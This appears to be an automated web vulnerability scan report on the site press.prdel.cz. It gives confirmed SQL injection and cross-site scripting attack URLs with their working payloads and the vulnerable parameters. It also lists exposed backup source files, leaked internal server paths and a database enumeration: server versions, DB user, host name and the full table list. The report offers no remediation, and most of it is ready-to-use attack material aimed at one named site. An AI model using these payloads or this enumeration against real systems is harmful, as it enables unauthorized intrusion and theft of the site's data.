- ||| Boolean Based SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- URL: http://press.prdel.cz/data.php3?st=' OR 'ns'='ns
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: st
- Parameter Type: Querystring
- Attack Pattern: ' OR 'ns'='ns
- Severity: Critical
- Confirmation: Confirmed
- URL: http://press.prdel.cz/audit-pridej.php3?id=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- Severity: Critical
- Confirmation: Confirmed
- URL: http://press.prdel.cz/data.php3?st=' OR 'ns'='ns&jmeno=3&prijmeni=3&jedna=3&dve=3&tri=3&autor=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: st
- Parameter Type: Querystring
- Attack Pattern: ' OR 'ns'='ns
- ||| XSS (Cross-site Scripting)
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/prew.php3?st=aaa
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: autor
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0008F3)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/prew.php3?st=aaa
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: dve
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0008F7)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/prew.php3?st=aaa
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: jedna
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0008FB)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/prew.php3?st='"--></style></script><script>alert(0x0008FC)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: st
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0008FC)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/prew.php3?st=aaa
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0008FF)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/prew.php3?st=aaa
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: prijmeni
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000901)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/prew.php3?st=aaa
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: tri
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000903)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/prew.php3?st='"--></style></script><script>alert(0x00090B)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: st
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x00090B)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/prew.php3?st=bush
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00090C)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/prew.php3?st=bush
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: prijmeni
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00090D)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/prew.php3?st=bush
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: dve
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00090E)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/prew.php3?st=bush
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: autor
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00090F)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/prew.php3?st=bush
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: jedna
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000910)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/index.php3?poz=20&bc=9'"--></style></script><script>alert(0x00097E)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: bc
- Parameter Type: Querystring
- Attack Pattern: 9'"--></style></script><script>alert(0x00097E)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://press.prdel.cz/data.php3?st=potrat&jmeno='"--></style></script><script>alert(0x0009A3)</script>&prijmeni=3&jedna=3&dve=3&tri=3&autor=3
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: jmeno
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0009A3)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/data.php3?st=potrat&jmeno=3&prijmeni='"--></style></script><script>alert(0x0009A6)</script>&jedna=3&dve=3&tri=3&autor=3
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: prijmeni
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0009A6)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/data.php3?st=potrat&jmeno=3&prijmeni=3&jedna='"--></style></script><script>alert(0x0009A8)</script>&dve=3&tri=3&autor=3
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: jedna
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0009A8)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/data.php3?st=potrat&jmeno=3&prijmeni=3&jedna=3&dve='"--></style></script><script>alert(0x0009AA)</script>&tri=3&autor=3
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: dve
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0009AA)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/data.php3?st=potrat&jmeno=3&prijmeni=3&jedna=3&dve=3&tri=3&autor='"--></style></script><script>alert(0x0009D0)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: autor
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0009D0)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/audit-pridej.php3?chyba=1&prjmeno=warning&prvec=warning&prkomentar=warning&vec='"--></style></script><script>alert(0x000AB2)</script>&komentar=3
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: vec
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000AB2)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/audit-pridej.php3?chyba=1&prjmeno=warning&prvec=warning&prkomentar=warning&vec=3&komentar='"--></style></script><script>alert(0x000AB3)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: komentar
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000AB3)</script>
- ||| Backup Source Code Found
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://press.prdel.cz/data.php3~
- Vulnerability Classifications: PCI 6.5.10 OWASP A7 CAPEC-87 CWE-425
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://press.prdel.cz/realizace.php3~
- Vulnerability Classifications: PCI 6.5.10 OWASP A7 CAPEC-87 CWE-425
- ||| [Possible] Internal Path Leakage (*nix)
- Severity: Information
- Confirmation: Confirmed
- Vulnerable URL: http://press.prdel.cz/phpinfo.php
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- Identified Internal Path(s):
- /usr/obj/usr/src/sys/GENERIC
- /usr/local/etc/php'
- /usr/local'
- /usr/local/man'
- /usr/local/info/'
- /usr/local/etc
- /usr/local/etc/php.ini
- /usr/local/etc/php
- /usr/local/etc/php/extensions.ini
- /var/log/php_errors.log
- /usr/local/lib/php/20090626
- /usr/local/share/pear
- /usr/sbin/sendmail -t -i
- /usr/sbin/sendmail
- /usr/home/costra/web/prdel.cz/press/phpinfo.php
- /usr/local/bin/php-cgi
- /usr/sbin:/usr/bin
- /usr/home/costra/web/prdel.cz/press
- ||| report db
- Target: http://press.prdel.cz/audit-pridej.php3?id=-1+OR+17-7%3d10
- Web Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2
- Powered-by: PHP/5.3.8
- DB Server: MySQL
- Resp. Time(avg): 5281 ms
- Current User: prdel_cz@localhost
- Sql Version: 5.5.17
- Current DB: prdel_cz
- System User: prdel_cz@localhost
- Host Name: fubar.sigpipe.cz
- Installation dir: /usr/local
- DB User: 'prdel_cz'@'localhost'
- Data Bases: information_schema, prdel_cz, test
- db: prdel_cz
- Tables:
- grossip
- pomozmegrossovi
- prd_ankety
- prd_ankety_odp
- prd_autent
- prd_clanecky
- prd_clanecky_anotace
- prd_clanky_souvis_id
- prd_hororskopy
- prd_kategorie
- prd_koment
- prd_odkazy
- prd_poezie
- prd_poezie_autori
- prd_posta
- prd_pratele
- prd_reg
- prd_rubriky
- prd_soutez
- prdsowclanky
- pressanketa
- pressclanky
- pressdata
- presskomentare
- pressmaily
- ras_koment
- System FreeBSD fubar.sigpipe.cz 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:15:25 UTC 2012 root@obrian.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386